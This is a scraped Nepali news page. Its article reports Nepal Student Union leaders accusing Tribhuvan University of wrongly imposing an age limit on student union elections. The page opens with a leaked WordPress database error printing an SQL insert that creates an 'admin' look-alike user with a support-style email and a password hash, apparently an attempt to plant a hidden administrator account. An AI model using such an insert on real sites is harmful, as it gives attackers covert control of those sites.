WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvdpM7yp5J.53Qa8W2N0vDmm0zdJju/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 06:42:47', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ १३-
नेपाली कांग्रेसको भातृ संगठन नेपाल विद्यार्थी संघले स्ववियु निर्वाचनमा उमेरको हद तोकेर त्रिभुवन विश्व विद्यालयले गम्भीर भूल गरेको आरोप लगाएको छ । बिहीबार रिपोर्टर्स क्लब नेपालमा नेपाल विद्यार्थी संघ जिल्ला कार्यसमिति काठमाडौंले पत्रकार सम्मेलन गरेर यस्तो आरोप लगाएको हो । नेविसंघका उपाध्यक्ष सागर परियारले मिश्रित चुनाव प्रणाली र उमेरको हद तोकेर गरिने स्ववियु निर्वाचनमा नेविसंघले भाग नलिने र जबरजस्ती गर्न खोजे त्यसको प्रतिकारमा उत्रिने चेतावनी दिनुभयो ।
त्यस्तै अर्की उपाध्यक्ष उर्मिला थपलियाले विद्यार्थी हुनको लागि उमेर आवश्यक नभए जस्तै विद्यार्थी आन्दोलन र विद्यार्थीको हकहितको लागि काम गर्नको लागि पनि उमेर नचाहिने बताउनुभयो । नेविसंघ जिल्ला कार्यसमिति काठमाडौंका सभापति मनोज वैद्यले उमेर हद तोकेर त्रिभूवन विश्व विद्यालयले स्ववियु निर्वाचन गर्ने सपना देखेको छ भने त्यो दिवा सपना मात्रै हुने बताउनुभयो । ‘यसो भन्दैमा हामी निवार्चनको विपक्षमा छैनौँ, हामी फागुन १४ गते तोकिएकै समयमा निर्वाचन हुनपर्छ भन्नेमा छौँ, तथापि चुनावको मिति घोषणा गर्दा कुनैपनि विद्यार्थी संगठनहरूका प्रतिनिधिलाई वैठकमा नराखेर विश्व विद्यालयले गम्भीर भूल गरेको छ’ उहाँले भन्नुभयो ।